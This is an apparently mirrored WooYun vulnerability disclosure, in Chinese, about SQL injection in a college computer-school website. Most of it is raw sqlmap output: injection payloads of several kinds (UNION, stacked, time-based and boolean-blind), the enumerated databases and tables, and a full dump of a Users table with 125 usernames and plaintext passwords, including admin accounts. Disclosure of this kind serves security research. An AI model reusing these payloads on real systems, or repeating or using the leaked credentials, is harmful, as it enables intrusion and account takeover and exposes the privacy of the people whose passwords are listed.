乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-11: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开
计算机学院的洞,好吧。表太多了,自己确认下有没有核心数据吧
http://**.**.**.**/ciecol/web/kcjs_detail.jsp?id=28
sqlmap identified the following injection points with a total of 56 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=131 AND 5029=5029 Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: id=-7999 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(83)+CHAR(107)+CHAR(108)+CHAR(67)+CHAR(73)+CHAR(98)+CHAR(109)+CHAR(105)+CHAR(115)+CHAR(81)+CHAR(113)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(113),NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=131; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=131 WAITFOR DELAY '0:0:5'-----web server operating system: Linux Ubuntuweb application technology: Nginx, JSPback-end DBMS: Microsoft SQL Server 2000available databases [8]:[*] ciedb[*] jxxy[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb
web server operating system: Linux Ubuntuweb application technology: Nginx, JSPback-end DBMS: Microsoft SQL Server 2000Database: ciedb[49 tables]+-------------------+| AdminACL || AdminACL || Dyml || Ejml || Xsml || Yjml || Zc || bgnw_jxdg || bgnw_jxjh || bgnw_xqrw || bkjx_kcjs || bkjx_zyjs || candidate || courseinfor || cybgxztype || deptinfor || dlxt || dtproperties || infolink || infolink || js_xwd_map || jsfc_temp2 || jsfc_temp2 || jsfc_temp3 || lxwm || notice || question || record || result || studentinfor || subjectinfor || sysconstraints || syssegments || systeminfor || t_jiaozhu || teacherlogin || userinfor_teacher || userinfor_teacher || voteresult || xkky_zdxk || xygk_jsfc || xygk_xrld || xygk_xyjj || xyjg || xyldmail || yjs_xwd || yqlj || zwdy || zwdy |+-------------------+
web server operating system: Linux Ubuntuweb application technology: Nginx, JSPback-end DBMS: Microsoft SQL Server 2000Database: jxxyTable: Users[9 columns]+---------------------+------------------+| Column | Type |+---------------------+------------------+| answer | varchar || ID | int || msrepl_tran_version | uniqueidentifier || note | varchar || password | varchar || privilege | varchar || question | varchar || type | int || username | varchar |+---------------------+------------------+
web server operating system: Linux Ubuntuweb application technology: Nginx, JSPback-end DBMS: Microsoft SQL Server 2000Database: jxxyTable: Users[125 entries]+----------+-------------+| username | password |+----------+-------------+| 1201300 | .3698741025 || 1216600 | 040206 || 1216700 | 09158579 || 1217100 | 1103087 || 1200100 | 1200100 || 1200200 | 1200200 || 1200300 | 1200300 || 1200400 | 1200400 || 1200700 | 1200700 || 1200900 | 1200900 || 1201000 | 1201000 || 1201100 | 1201100 || 1201200 | 1201200 || 1201600 | 1201600 || 1201800 | 1201800 || 1202100 | 1202100 || 1202400 | 1202400 || 1202500 | 1202500 || 1202600 | 1202600 || 1202800 | 1202800 || 1203000 | 1203000 || 1203200 | 1203200 || 1203300 | 1203300 || 1203400 | 1203400 || 1203500 | 1203500 || 1203600 | 1203600 || 1203700 | 1203700 || 1203800 | 1203800 || 1203900 | 1203900 || 1204400 | 1204400 || 1204700 | 1204700 || 1204800 | 1204800 || 1204900 | 1204900 || 1205000 | 1205000 || 1205100 | 1205100 || 1205200 | 1205200 || 1205300 | 1205300 || 1205400 | 1205400 || 1205600 | 1205600 || 1205700 | 1205700 || 1205800 | 1205800 || 1206000 | 1206000 || 1206500 | 1206500 || 1206600 | 1206600 || 1206700 | 1206700 || 1206900 | 1206900 || 1207100 | 1207100 || 1207300 | 1207300 || 1207400 | 1207400 || 1207600 | 1207600 || 1207700 | 1207700 || 1207800 | 1207800 || 1207900 | 1207900 || 1208000 | 1208000 || 1208100 | 1208100 || 1208400 | 1208400 || 1208500 | 1208500 || 1208800 | 1208800 || 1208900 | 1208900 || 1209200 | 1209200 || 1209300 | 1209300 || 1209400 | 1209400 || 1209500 | 1209500 || 1209600 | 1209600 || 1209800 | 1209800 || 1209900 | 1209900 || 1210000 | 1210000 || 1210100 | 1210100 || 1210200 | 1210200 || 1210300 | 1210300 || 1210400 | 1210400 || 1210500 | 1210500 || 1210800 | 1210800 || 1210900 | 1210900 || 1211000 | 1211000 || 1211100 | 1211100 || 1211200 | 1211200 || 1211300 | 1211300 || 1211800 | 1211800 || 1211900 | 1211900 || 1212000 | 1212000 || 1212200 | 1212200 || 1212300 | 1212300 || 1212400 | 1212400 || 1212900 | 1212900 || 1213000 | 1213000 || 1213100 | 1213100 || 1213300 | 1213300 || 1213400 | 1213400 || 1213500 | 1213500 || 1213600 | 1213600 || 1213700 | 1213700 || 1213800 | 1213800 || 1213900 | 1213900 || 1214000 | 1214000 || 1214100 | 1214100 || 1214300 | 1214300 || 1214600 | 1214600 || 1214700 | 1214700 || 1214800 | 1214800 || 1215100 | 1215100 || 1215200 | 1215200 || 1216100 | 1216100 || 1216200 | 1216200 || 1216400 | 1216400 || 1216800 | 1216800 || 1216900 | 1216900 || 1214400 | 198343 || 2505200 | 2505200 || 2506400 | 2506400 || admin3 | 28008309 || 1212700 | 301110 || 1213200 | 51life || 1201900 | 611511 || 1203100 | 626311 || 1202300 | 717102 || 1215300 | 790406 || 1204500 | 826631 || admin2 | admin2 || admin5 | admin5 || 1216300 | arealman || chen | chen || 1214500 | dg0615015 || 1216000 | enose173 || 1217000 | p801130 |+----------+-------------+
过滤
危害等级:无影响厂商忽略
忽略时间:2015-11-24 13:00
暂无
